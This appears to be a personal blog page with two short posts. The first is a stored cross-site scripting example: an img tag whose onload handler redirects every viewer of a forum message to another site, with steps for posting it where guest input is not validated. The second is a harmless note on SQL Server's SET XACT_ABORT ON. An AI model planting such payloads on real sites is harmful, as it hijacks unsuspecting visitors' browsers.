Windows LiveWindows Live
 
 
junwei's profileRichard's footprint on ....PhotosBlogListsMore Tools Help

Blog
    July 31

    An xss sample

    scenario: some forums without input well validated and guest message is allowed to input.
    step:leave the following code snippet
    <img src="http://google.com/images/logo.gif" onload="window.location='http://kelekingone.spaces.msn.com'" />
     and submit your message.
    result:each time this message viewed, it will bring you to http://kelekingone.spaces.msn.com.
    11:51 PM | Add a comment | Permalink | Blog it | javascript
    July 27

    SET XACT_ABORT ON

    Today, when I viewed Duwamish source code, I found this sqlserver option. I remembered in my program I always checked the @@error variable and then made decision to make sure the atomicy of the whole transaction. Since there existed this SET XACT_ABORT ON option, I think it can be a better choice because of its elegence and simplicity.
    10:25 PM | Add a comment | Permalink | Blog it | SqlServer